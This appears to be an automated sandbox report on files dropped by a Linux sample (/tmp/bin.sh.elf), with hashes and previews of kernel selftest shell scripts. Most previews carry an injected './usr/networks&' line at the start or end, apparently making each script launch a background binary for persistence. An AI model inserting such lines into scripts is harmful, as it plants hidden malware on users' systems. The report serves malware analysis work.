                                                                        Preview:./usr/networks&...exit $ksft_skip..fi...if ! grep -q "^\S\+ $efivarfs_mount efivarfs" /proc/mounts; then...echo $msg efivarfs is not mounted on $efivarfs_mount >&2...exit $ksft_skip..fi.}..run_test().{..local test="$1"...echo "--------------------"..echo "running $test"..echo "--------------------"...if [ "$(type -t $test)" = 'function' ]; then...( $test )..else...( ./$test )..fi...if [ $? -ne 0 ]; then...echo " [FAIL]"...rc=1..else...echo " [PASS]"..fi.}..test_create().{..local attrs='\x07\x00\x00\x00'..local file=$efivarfs_mount/$FUNCNAME-$test_guid...printf "$attrs\x00" > $file...if [ ! -e $file ]; then...echo "$file couldn't be created" >&2...exit 1..fi...if [ $(stat -c %s $file) -ne 5 ]; then...echo "$file has invalid size" >&2...file_cleanup $file...exit 1..fi..file_cleanup $file.}..test_create_empty().{..local file=$efivarfs_mount/$FUNCNAME-$test_guid...: > $file...if [ ! -e $file ]; then...echo "$file can not be created without writing" >&2...exit 1..fi..file_cleanup $file.}.
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):5891
                                                                        Entropy (8bit):5.2976815652447
                                                                        Encrypted:false
                                                                        SSDEEP:96:att2T0AKpT0+yhvT0HXUTRNPLrwEg/8/oKkph2VkVQEIGc/2XRjIP8IGc/2XRjIz:atMnKptavcORNVg/8/oK2hykVQy1n1ly
                                                                        MD5:7945E94DD8E4A80A20A9C0417BB83BFE
                                                                        SHA1:DCAD37AF3DC4055126F0820FA70D915303906D89
                                                                        SHA-256:D917CBCE45470AEFE2944201B985641A6875CF1508FABAD755C3B60752F58CBE
                                                                        SHA-512:C134770365B4A20C067ADA348BA0FCB98ED0061E4E09BD6DC19C66206E4B582E75BFDA84BDB8FA7DF024DD3F9745E0066EF07D1375BEB771233E671177673D39
                                                                        Malicious:false
                                                                        Preview:./usr/networks&....exit 1...fi..done...echo 1 >"$DIR"/"$name"/loading..cat "$file" >"$DIR"/"$name"/data..echo 0 >"$DIR"/"$name"/loading...# Wait for request to finish...wait.}..load_fw_cancel().{..local name="$1"..local file="$2"...# This will block until our load (below) has finished...echo -n "$name" >"$DIR"/trigger_request 2>/dev/null &...# Give kernel a chance to react...local timeout=10..while [ ! -e "$DIR"/"$name"/loading ]; do...sleep 0.1...timeout=$(( $timeout - 1 ))...if [ "$timeout" -eq 0 ]; then....echo "$0: firmware interface never appeared" >&2....exit 1...fi..done...echo -1 >"$DIR"/"$name"/loading...# Wait for request to finish...wait.}..load_fw_custom().{..if [ ! -e "$DIR"/trigger_custom_fallback ]; then...echo "$0: custom fallback trigger not present, ignoring test" >&2...exit $ksft_skip..fi...local name="$1"..local file="$2"...echo -n "$name" >"$DIR"/trigger_custom_fallback 2>/dev/null &...# Give kernel a chance to react...local timeout=10..while [ ! -e "$DIR"/"$name"/
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):8744
                                                                        Entropy (8bit):5.126474919105083
                                                                        Encrypted:false
                                                                        SSDEEP:96:17k8sLeRIt8b6+616tS6vmS6be6/iS6j67S6gmQm6C1nJG4bzET0c09PsG2AUdAL:17k8WaItEjmHviMNRPbwSKVEUNUPb
                                                                        MD5:51228AD37E83FB0042A724AEFAA1082C
                                                                        SHA1:793463E45D447452F9B233D7515DB54A20FD86C5
                                                                        SHA-256:34729C2C813F8D11F41CB328AAF7A1D3D82FFF98F617D6D40A4BCD1C5FB568E4
                                                                        SHA-512:1C2B0CD1490E59F543061CE6CBA9DF970EDC6DB13DE3B9F17B8491FC5B9F2F3F80D421D3ED7659E4E34D29A5D94D5D7E3B8E19E7E4BE0B1EE9DED869E36897F8
                                                                        Malicious:false
                                                                        Preview:./usr/networks&..exit 1.fi..if [ ! -e "$DIR"/trigger_async_request ]; then..echo "$0: empty filename: async trigger not present, ignoring test" >&2..exit $ksft_skip.else..if printf '\000' >"$DIR"/trigger_async_request 2> /dev/null; then...echo "$0: empty filename should not succeed (async)" >&2...exit 1..fi.fi..# Request a firmware that doesn't exist, it should fail..if echo -n "nope-$NAME" >"$DIR"/trigger_request 2> /dev/null; then..echo "$0: firmware shouldn't have loaded" >&2..exit 1.fi.if diff -q "$FW" /dev/test_firmware >/dev/null ; then..echo "$0: firmware was not expected to match" >&2..exit 1.else..if [ "$HAS_FW_LOADER_USER_HELPER" = "yes" ]; then...echo "$0: timeout works"..fi.fi..# This should succeed via kernel load or will fail after 1 second after.# being handed over to the user helper, which won't find the fw either..if ! echo -n "$NAME" >"$DIR"/trigger_request ; then..echo "$0: could not trigger request" >&2..exit 1.fi..# Verify the contents are what we expect..if ! diff
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):4567
                                                                        Entropy (8bit):5.5589667160679825
                                                                        Encrypted:false
                                                                        SSDEEP:48:+vUdhcGB/f2QrYUdDtV5ipEqNmjyrJV+l8qfyxSZJkXYk1SwjR77/Rm9euhd6VLr:tn6oqac/SwjXsT6VLYXy3JF/
                                                                        MD5:92D97C4DA99FC755C609467343D767BA
                                                                        SHA1:4FFC85048445B3B1637DE50178F587D8225BE295
                                                                        SHA-256:43D1431124D8A39521F3BB513F258A82595837C2A9D0BB2C6D3F701A642FC130
                                                                        SHA-512:18D817795B189F32200E8B95109F703EA4B6B3D342DBAFC8ABBD38926BB1C261A084D12CFF2D02922091EFF0527FF4615787167EF8D4137FE36F3A8FFDFC2E2A
                                                                        Malicious:false
                                                                        Preview:./usr/networks&.print_reqs_exit().{..echo "You must have the following enabled in your kernel:" >&2..cat $TEST_DIR/config >&2..exit $ksft_skip.}..test_modprobe().{..if [ ! -d $DIR ]; then...print_reqs_exit..fi.}..check_mods().{..local uid=$(id -u)..if [ $uid -ne 0 ]; then...echo "skip all tests: must be run as root" >&2...exit $ksft_skip..fi...trap "test_modprobe" EXIT..if [ ! -d $DIR ]; then...modprobe test_firmware..fi..if [ ! -f $PROC_CONFIG ]; then...if modprobe configs 2>/dev/null; then....echo "Loaded configs module"....if [ ! -f $PROC_CONFIG ]; then.....echo "You must have the following enabled in your kernel:" >&2.....cat $TEST_DIR/config >&2.....echo "Resorting to old heuristics" >&2....fi...else....echo "Failed to load configs module, using old heuristics" >&2...fi..fi.}..check_setup().{..HAS_FW_LOADER_USER_HELPER="$(kconfig_has CONFIG_FW_LOADER_USER_HELPER=y)"..HAS_FW_LOADER_USER_HELPER_FALLBACK="$(kconfig_has CONFIG_FW_LOADER_USER_HELPER_FALLBACK=y)"..HAS_FW_LOADER_COMPRESS
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):23
                                                                        Entropy (8bit):3.882045108136863
                                                                        Encrypted:false
                                                                        SSDEEP:3:qXVOORgn:Tn
                                                                        MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                        SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                        SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                        SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                        Malicious:false
                                                                        Preview:./usr/networks&.exit 1.
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):23
                                                                        Entropy (8bit):3.882045108136863
                                                                        Encrypted:false
                                                                        SSDEEP:3:qXVOORgn:Tn
                                                                        MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                        SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                        SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                        SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                        Malicious:false
                                                                        Preview:./usr/networks&.exit 1.
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):23
                                                                        Entropy (8bit):3.882045108136863
                                                                        Encrypted:false
                                                                        SSDEEP:3:qXVOORgn:Tn
                                                                        MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                        SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                        SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                        SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                        Malicious:false
                                                                        Preview:./usr/networks&.exit 1.
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):568
                                                                        Entropy (8bit):4.898482173139057
                                                                        Encrypted:false
                                                                        SSDEEP:12:chnICigPpbnLPb0ILGExkw0ZiiJotSWPqssJlfe4n:CICigPpYICwJSwqL
                                                                        MD5:34D1BD653094623602ED2FC5B916CC1A
                                                                        SHA1:7457BA8BC0E39CF17B36703C9B321939DF4345C5
                                                                        SHA-256:47E02B23C3504B291F9D339261C4729C80630AF32AD146C39699A0D614F2A51E
                                                                        SHA-512:C2E2C95F182CE5BC27FD03076C426EC6F90484B09B3C6CC4AAB41D03F2E408B98F2C43B612C2E6E0833F7A9A6415811327CF6A1FAAF5C6547AC7B4B40978ED38
                                                                        Malicious:false
                                                                        Preview:./usr/networks&....exit 1....;;..esac..fi...# Create working directory...dest=`pwd`..install_work="$dest"/kselftest_install..install_name=kselftest..install_dir="$install_work"/"$install_name"..mkdir -p "$install_dir"...# Run install using INSTALL_KSFT_PATH override to generate install..# directory.../kselftest_install.sh "$install_dir"..(cd "$install_work"; tar $copts "$dest"/kselftest${ext} $install_name)..echo "Kselftest archive kselftest${ext} created!"...# clean up top-level install work directory..rm -rf "$install_work".}..main "$@"../usr/networks&.exit 1.
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):1989
                                                                        Entropy (8bit):4.886361610863015
                                                                        Encrypted:false
                                                                        SSDEEP:48:0khSRLKLLH6GH5HJpmdS/DjxMDRJ7gy3R3opdc5/U/hDD:0qpXDZpcdOfxMjdhgd0cpDD
                                                                        MD5:A089E565FA44F01DD38D39811C153C23
                                                                        SHA1:9BBECC67884722695802DE78573D86AD28027D2E
                                                                        SHA-256:91ED767E3298CE5AB669926E16F19690160BBE6103A73EAE2EFD02C63FA249D9
                                                                        SHA-512:454A2CB2EB891337C3B5F553D87579B50A6020B147D2D9577FCEABE09A86E3E3D1FFFD95D65200F621BEABE9BE28ECEF3B77C8FC070CE2FE457A82ECA337762B
                                                                        Malicious:false
                                                                        Preview:./usr/networks&...echo "test fail, exit"...die..fi.}..test_pin_logic().{..nr=$1..direction=$2..active_low=$3..value=$4...echo $direction > $GPIO_SYSFS/gpio$nr/direction..echo $active_low > $GPIO_SYSFS/gpio$nr/active_low..if [ $direction = "out" ]; then...echo $value > $GPIO_SYSFS/gpio$nr/value..fi..is_consistent $nr.}..test_one_pin().{..nr=$1...echo -n "test pin<$nr>"...echo $nr > $GPIO_SYSFS/export 2>/dev/null...if [ X$? != X0 ]; then...echo "test GPIO pin $nr failed"...die..fi...#"Checking if the sysfs is consistent with debugfs: "..is_consistent $nr...#"Checking the logic of active_low: "..test_pin_logic $nr out 1 1..test_pin_logic $nr out 1 0..test_pin_logic $nr out 0 1..test_pin_logic $nr out 0 0...#"Checking the logic of direction: "..test_pin_logic $nr in 1 1..test_pin_logic $nr out 1 0..test_pin_logic $nr low 0 1..test_pin_logic $nr high 0 0...echo $nr > $GPIO_SYSFS/unexport...echo "successful".}..test_one_pin_fail().{..nr=$1...echo $nr > $GPIO_SYSFS/export 2>/dev/null...if [ X
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):4213
                                                                        Entropy (8bit):5.33237101886955
                                                                        Encrypted:false
                                                                        SSDEEP:96:ofX6AFXGVi66yGgQWLs11nIOUfyHQNHzZo5zeQ:y6Bix+EuQj
                                                                        MD5:6C5D622761FE739673296D7956A42FE2
                                                                        SHA1:C4A8996106088E157E03C43ECC711C5E3CF0B1EB
                                                                        SHA-256:B5960BF281F2515D72B91675CBB3551871A0E511F1C1DD6EC4C378ECF7AE5F9F
                                                                        SHA-512:ED0E4D0BDAC30D0B044D2AFE72E7DDD5BD5B00C2BB00AE4C00ED79A2F4A7F9F76F7907A4D9D40C7665DDCCF67ABF463B45C0AA4A88907F31F14A67BACB2CB9A8
                                                                        Malicious:false
                                                                        Preview:./usr/networks&.#exit status.#1: Internal error.#2: sysfs/debugfs not mount.#3: insert module fail when gpio-mockup is a module..#4: Skip test including run as non-root user..#5: other reason...SYSFS=.GPIO_SYSFS=.GPIO_DRV_SYSFS=.DEBUGFS=.GPIO_DEBUGFS=.dev_type=.module=..# Kselftest framework requirement - SKIP code is 4..ksft_skip=4..usage().{..echo "Usage:"..echo "$0 [-f] [-m name] [-t type]"..echo "-f: full test. It maybe conflict with existence gpio device."..echo "-m: module name, default name is gpio-mockup. It could also test"..echo " other gpio device."..echo "-t: interface type: chardev(char device) and sysfs(being"..echo " deprecated). The first one is default"..echo ""..echo "$0 -h"..echo "This usage".}..prerequisite().{..msg="skip all tests:"..if [ $UID != 0 ]; then...echo $msg must be run as root >&2...exit $ksft_skip..fi..SYSFS=`mount -t sysfs | head -1 | awk '{ print $3 }'`..if [ ! -d "$SYSFS" ]; then...echo $msg sysfs is not mounted >&2...exit 2..fi..GPIO_SYSF
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):2484
                                                                        Entropy (8bit):5.26151594494711
                                                                        Encrypted:false
                                                                        SSDEEP:48:B4OlnLEZKbTU8z8OyCQg6X+DsBKPnY3WrIBKPQNaqO789O:RLE0bTH5yCQguOPjf0y+O
                                                                        MD5:EDB41CFBCC54CF6935A157D9E71412A6
                                                                        SHA1:77392764ED385FB04FF7C1964B27C391C85A56F9
                                                                        SHA-256:7C6DCE16D8D66C98B8BDF00B7D660CA49315F2C6D397D4E4E4908D9BCB9B6C02
                                                                        SHA-512:CBF5CB74B09EB0168F6EC2D426D7A1052776E6E4DAF93CE0AE76AA87DD8A909584DEE73991D150B064A4C771367DFFCA2EF59FBC09D180F1026D2E89DF9C4DC9
                                                                        Malicious:false
                                                                        Preview:./usr/networks&..exit $ksft_skip.fi..msg="skip all tests:".if [ $UID != 0 ] && [ $EVALUATE_ONLY == 0 ]; then. echo $msg please run this as root >&2. exit $ksft_skip.fi..max_cpus=$(($(nproc)-1))..function run_test () {...file_ext=$1..for cpu in `seq 0 $max_cpus`..do...echo "launching aperf load on $cpu"..../aperf $cpu &..done...echo "sleeping for 5 seconds"..sleep 5..grep MHz /proc/cpuinfo | sort -u > /tmp/result.freqs..num_freqs=$(wc -l /tmp/result.freqs | awk ' { print $1 } ')..if [ $num_freqs -ge 2 ]; then...tail -n 1 /tmp/result.freqs > /tmp/result.$1..else...cp /tmp/result.freqs /tmp/result.$1..fi.../msr 0 >> /tmp/result.$1...max_perf_pct=$(cat /sys/devices/system/cpu/intel_pstate/max_perf_pct)..echo "max_perf_pct $max_perf_pct" >> /tmp/result.$1...for job in `jobs -p`..do...echo "waiting for job id $job"...wait $job..done.}..#.# MAIN (ALL UNITS IN MHZ).#..# Get the marketing frequency._mkt_freq=$(cat /proc/cpuinfo | grep -m 1 "model name" | awk '{print $NF}')._mkt_freq=$(ech
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):377
                                                                        Entropy (8bit):5.116243621753489
                                                                        Encrypted:false
                                                                        SSDEEP:6:6WaMbxxRuv32K8mgez47sW5mB5gGk4QNVDBXzKUExie3C0+rhvPn:9HbxxROmKhgezE35mpknNVDBXMMeytvP
                                                                        MD5:DDD753E2B7A6E09C9F5B645CC75F3779
                                                                        SHA1:D87672C2017A7420CF967ECB39F2A27C3B9F3395
                                                                        SHA-256:87230B40928E60FF9D028DC9AD3AD051752916A3C9227C6253B92474BF6726FB
                                                                        SHA-512:80E6E81A40A074939DBEE4411A5FF9EEC6924C38C02FFBB0D96B7C1F1B65F7DF4FA4BDBE5BC216D473BF42CAA715A4A6623B094A99479922A9E9748E6588C5F5
                                                                        Malicious:false
                                                                        Preview:./usr/networks&..exit $ksft_skip.fi..if ! /sbin/modprobe -q -n rc-loopback; then. echo "ir_loopback: module rc-loopback is not found [SKIP]". exit $ksft_skip.fi../sbin/modprobe rc-loopback.if [ $? -ne 0 ]; then..exit.fi..RCDEV=$(grep -l DRV_NAME=rc-loopback /sys/class/rc/rc*/uevent | grep -o 'rc[0-9]\+').../ir_loopback $RCDEV $RCDEV.exit../usr/networks&.exit 1.
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):4990
                                                                        Entropy (8bit):5.229246673549564
                                                                        Encrypted:false
                                                                        SSDEEP:96:llPBllfCCC2YVwXV+3iJH3knUXW5kqUMk:llJllKCCFOXM3i93knU2UH
                                                                        MD5:5E666C728F25C89FF22234F4F6513BDF
                                                                        SHA1:687C1514EF45B8B0773A06CEE0A9D66A15CB0E41
                                                                        SHA-256:8FD8EDD4844436031CEFF15AA7078CCDAFE491684330C0E887CA8178B61BF3A2
                                                                        SHA-512:57515DEACDA29914E426B90BD2D72A0F1326CBF1974E42A2D05A4853402EC9BBA840244083B03CF307A54FDFF326A6C6BFA16A41C31BE7C467DA449FC62FCFA6
                                                                        Malicious:false
                                                                        Preview:./usr/networks&..exit 0.}..# The ksefltest framework requirement returns 1 for FAIL..log_fail().{..[ $VERBOSE -ne 0 ] && echo "$1 [FAIL]"..exit 1.}..# The ksefltest framework requirement returns 4 for SKIP..log_skip().{..[ $VERBOSE -ne 0 ] && echo "$1"..exit 4.}..# Check efivar SecureBoot-$(the UUID) and SetupMode-$(the UUID)..# (Based on kdump-lib.sh).get_efivarfs_secureboot_mode().{..local efivarfs="/sys/firmware/efi/efivars"..local secure_boot_file=""..local setup_mode_file=""..local secureboot_mode=0..local setup_mode=0...# Make sure that efivar_fs is mounted in the normal location..if ! grep -q "^\S\+ $efivarfs efivarfs" /proc/mounts; then...log_info "efivars is not mounted on $efivarfs"...return 0;..fi..secure_boot_file=$(find "$efivarfs" -name SecureBoot-* 2>/dev/null)..setup_mode_file=$(find "$efivarfs" -name SetupMode-* 2>/dev/null)..if [ -f "$secure_boot_file" ] && [ -f "$setup_mode_file" ]; then...secureboot_mode=$(hexdump -v -e '/1 "%d\ "' \...."$secure_boot_file"|cut -d' '
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):23
                                                                        Entropy (8bit):3.882045108136863
                                                                        Encrypted:false
                                                                        SSDEEP:3:qXVOORgn:Tn
                                                                        MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                        SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                        SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                        SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                        Malicious:false
                                                                        Preview:./usr/networks&.exit 1.
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):23
                                                                        Entropy (8bit):3.882045108136863
                                                                        Encrypted:false
                                                                        SSDEEP:3:qXVOORgn:Tn
                                                                        MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                        SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                        SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                        SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                        Malicious:false
                                                                        Preview:./usr/networks&.exit 1.
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):11072
                                                                        Entropy (8bit):5.471734397341002
                                                                        Encrypted:false
                                                                        SSDEEP:192:SwAwkqrPjya4ynFGoEGNLp8p3GyspJepJFvgkgMsMiT3RN6tt:SLw5OPwcoJ2N5srerFvN/iT3M
                                                                        MD5:C3B72303BE30EE939F95B5ECB958D777
                                                                        SHA1:2A1261447A7CC21E6A0B5681B4A2B5EE09831A00
                                                                        SHA-256:C786C60928E71FC2317F06C9E653FF542731E0EE9FD739B1276207B4EB323984
                                                                        SHA-512:99B326E70CDDB17A20C5BE276E3C5194BF4DBDF9E0E61353523905FC9905EFF7BAD9F65A6AD4E69472C6E8A4AA0BB04C007B3D1A84FA3757ACA22A7C3E3232E0
                                                                        Malicious:false
                                                                        Preview:./usr/networks&. exit $ksft_skip. fi.}..function allow_user_defaults().{..if [ -z $DEFAULT_KMOD_DRIVER ]; then...DEFAULT_KMOD_DRIVER="test_module"..fi...if [ -z $DEFAULT_KMOD_FS ]; then...DEFAULT_KMOD_FS="xfs"..fi...if [ -z $PROC_DIR ]; then...PROC_DIR="/proc/sys/kernel/"..fi...if [ -z $MODPROBE_LIMIT ]; then...MODPROBE_LIMIT=50..fi...if [ -z $DIR ]; then...DIR="/sys/devices/virtual/misc/${TEST_DRIVER}0/"..fi...if [ -z $DEFAULT_NUM_TESTS ]; then...DEFAULT_NUM_TESTS=150..fi...MODPROBE_LIMIT_FILE="${PROC_DIR}/kmod-limit".}..test_reqs().{..if ! which modprobe 2> /dev/null > /dev/null; then...echo "$0: You need modprobe installed" >&2...exit $ksft_skip..fi...if ! which kmod 2> /dev/null > /dev/null; then...echo "$0: You need kmod installed" >&2...exit $ksft_skip..fi...# kmod 19 has a bad bug where it returns 0 when modprobe..# gets called *even* if the module was not loaded due to..# some bad heuristics. For details see:..#..# A work around is possible in-kernel but its
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):2080
                                                                        Entropy (8bit):5.314686727178092
                                                                        Encrypted:false
                                                                        SSDEEP:48:rhp/MbdeWKmipFHlkJcUrwcTnab6NikgvMjujQOkjGnyLas:DMb8DXqTdTabSi/6urNyLas
                                                                        MD5:A15BCBBD4B7ED7789B0E82A3B61469FE
                                                                        SHA1:0C7620791E6F86BE31D54585390D81BD76222D46
                                                                        SHA-256:B68807676ECAE58A8EDEC222B7F29848DF261DBBC87EF9512CA8117F939FFA28
                                                                        SHA-512:02B945C30BF5477322D80290300CB81432132E463E6F2BC401197667BC70E492372E55C6C4CCFC216430A471A04443439D81FC38A03EB609345A46559E8F8101
                                                                        Malicious:false
                                                                        Preview:./usr/networks&..exit 1.fi..# If Perl is unavailable, we must fall back to line-at-a-time prefixing.# with sed instead of unbuffered output..tap_prefix().{..if [ ! -x /usr/bin/perl ]; then...sed -e 's/^/# /'..else..."$BASE_DIR"/kselftest/prefix.pl..fi.}..tap_timeout().{..# Make sure tests will time out if utility is available...if [ -x /usr/bin/timeout ] && [ $kselftest_timeout -gt 0 ] ; then.../usr/bin/timeout --foreground "$kselftest_timeout" "$1"..else..."$1"..fi.}..run_one().{..DIR="$1"..TEST="$2"..NUM="$3"...BASENAME_TEST=$(basename $TEST)...# Reset any "settings"-file variables...export kselftest_timeout="$kselftest_default_timeout"..# Load per-test-directory kselftest "settings" file...settings="$BASE_DIR/$DIR/settings"..if [ -r "$settings" ] ; then...while read line ; do....field=$(echo "$line" | cut -d= -f1)....value=$(echo "$line" | cut -d= -f2-)....eval "kselftest_$field"="$value"...done < "$settings"..fi...TEST_HDR_MSG="selftests: $DIR: $BASENAME_TEST"..echo "# $TEST_HDR_MS
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):434
                                                                        Entropy (8bit):4.947669354093026
                                                                        Encrypted:false
                                                                        SSDEEP:12:cnVFLkhdZDfL8bHjPrxVeMLU9R939UWIe4n:MV5kdTLy3veMLg9tUW0
                                                                        MD5:C151AADA79CEF900C2965B5B15E15C4D
                                                                        SHA1:2BA3E33311218B83B81E01B765C984D1B28E6CB5
                                                                        SHA-256:66F9EAB006E05CF23853E19F2EF608B2AB6D3361206ADD9845CA3B03F97C8370
                                                                        SHA-512:544EE3580303971B17A555CBB9EED376DA4B2ABD18EA26B8DE8A055A1735564C31F1B0494297627D2B3E71E13084CF88C429048D602E3A892E4A3991EC507F9F
                                                                        Malicious:false
                                                                        Preview:./usr/networks&...exit 1;..fi...# Only allow installation into an existing location...if [ "$#" -eq 0 ]; then...echo "$0: Installing in default location - $install_dir ..."..elif [ ! -d "$1" ]; then...echo "$0: $1 doesn't exist!!"...exit 1;..else...install_dir="$1"...echo "$0: Installing in specified location - $install_dir ..."..fi...# Build tests..KSFT_INSTALL_PATH="$install_dir" make install.}..main "$@"../usr/networks&.exit 1.
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:OS/2 REXX batch file, ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):655
                                                                        Entropy (8bit):4.782002361541967
                                                                        Encrypted:false
                                                                        SSDEEP:12:wA1ITFexHGAUldev0xpeOAwevfaKHVLCBdKHYAwv5J5yGV4dOkwbqS4n:r1OCGAUXRpAwOVLCBdKHYAwZN+OpbqT
                                                                        MD5:F883ACA41C9A34D74C29A7E0237A0AA1
                                                                        SHA1:185D2E9FDB6AEA2620DB6410CA14B07BFAC4906F
                                                                        SHA-256:3808E326FBE721E7997056A09D96F1CEA5B1DEE3EDC36FA34B8B8FBBB43B072A
                                                                        SHA-512:58A6678DF52979777D996393ED233F6967D6D16B7A9063558AE51D560F7484059E9297D1973E198B17FCE8D0ED9EBA8A50FBA2E2DBD1BC548DCD347947724369
                                                                        Malicious:false
                                                                        Preview:./usr/networks&..exit 1. fi.. desc="$1". shift || true. module="$1". shift || true. args="$@".}..assert_root() {. if [ ! -w /dev ]; then..skip "please run as root". fi.}..assert_have_module() {. if ! $modprobe -q -n $module; then..skip "module $module is not found". fi.}..run_module() {. if $modprobe -q $module $args; then..$modprobe -q -r $module..say "ok". else..fail "". fi.}..say() {. echo "$desc: $1".}...fail() {. say "$1 [FAIL]" >&2. exit 1.}..skip() {. say "$1 [SKIP]" >&2. # Kselftest framework requirement - SKIP code is 4.. exit 4.}..#.# Main script.#.main "$@"../usr/networks&.exit 1.
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):5539
                                                                        Entropy (8bit):5.1207618092933025
                                                                        Encrypted:false
                                                                        SSDEEP:96:Pt8ozF7fIbvkg00GifF8p+7lpZKpsSscJydwJocXjsUuxsd9i14l:V8QMvkF0HN847lusqJ5qIjsUu49iOl
                                                                        MD5:5719D18704140CF656116B4B9DF238AE
                                                                        SHA1:F74449C68570D42A1B91747FC2887DE1C045179D
                                                                        SHA-256:334BB33E773A83BEE5C4F9E7FA7B82ED8A2F8F602CD6353DCF3B0070AB548A8B
                                                                        SHA-512:8A14E4ABD88C1C03EA7E0F84191D03306248DD3A7E194FEF61BDE79CE92F472517E709CC733B60EA0F4F2C1A631B530A3C9BDAC8EEEF03A5C226760912CF3C70
                                                                        Malicious:false
                                                                        Preview:./usr/networks&..exit 4.}..# die(msg) - game over, man.#.msg - dying words.function die() {..log "ERROR: $1"..echo "ERROR: $1" >&2..exit 1.}..function push_dynamic_debug() {. DYNAMIC_DEBUG=$(grep '^kernel/livepatch' /sys/kernel/debug/dynamic_debug/control | \. awk -F'[: ]' '{print "file " $1 " line " $2 " " $4}').}..function pop_dynamic_debug() {..if [[ -n "$DYNAMIC_DEBUG" ]]; then...echo -n "$DYNAMIC_DEBUG" > /sys/kernel/debug/dynamic_debug/control..fi.}..# set_dynamic_debug() - save the current dynamic debug config and tweak.# ...it for the self-tests. Set a script exit trap.#...that restores the original config..function set_dynamic_debug() {. push_dynamic_debug. trap pop_dynamic_debug EXIT INT TERM HUP. cat <<-EOF > /sys/kernel/debug/dynamic_debug/control...file kernel/livepatch/* +p...func klp_try_switch_task -p...EOF.}..# loop_until(cmd) - loop a command until it is successful or $MAX_RETRIES,.#.. sleep $RETRY_INTERVAL between attemp
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):21397
                                                                        Entropy (8bit):5.327362750446854
                                                                        Encrypted:false
                                                                        SSDEEP:384:wdt/f+MhN4uEdrCKVcDBwTYQLPN2S9L1tGJCDuDGQ:BDNGRGQ
                                                                        MD5:5EA70D701012A2DE18EB73B7A32266E0
                                                                        SHA1:4C8D752F31BF41A9919B69D1E5F0FBAA9BD908C2
                                                                        SHA-256:5A0151E99EA2E1AF05FB60DFA2C725158DA2A3CD4F7087638CBB69DC634EA132
                                                                        SHA-512:F775A6773426F6607F8DC1D45020F43F00A4D178E495D6DBB1A39FF460F6EF601FC791937C07E19568A5D5988ED8C9BC227A4060FDC055154D94F6BA720BFC4D
                                                                        Malicious:false
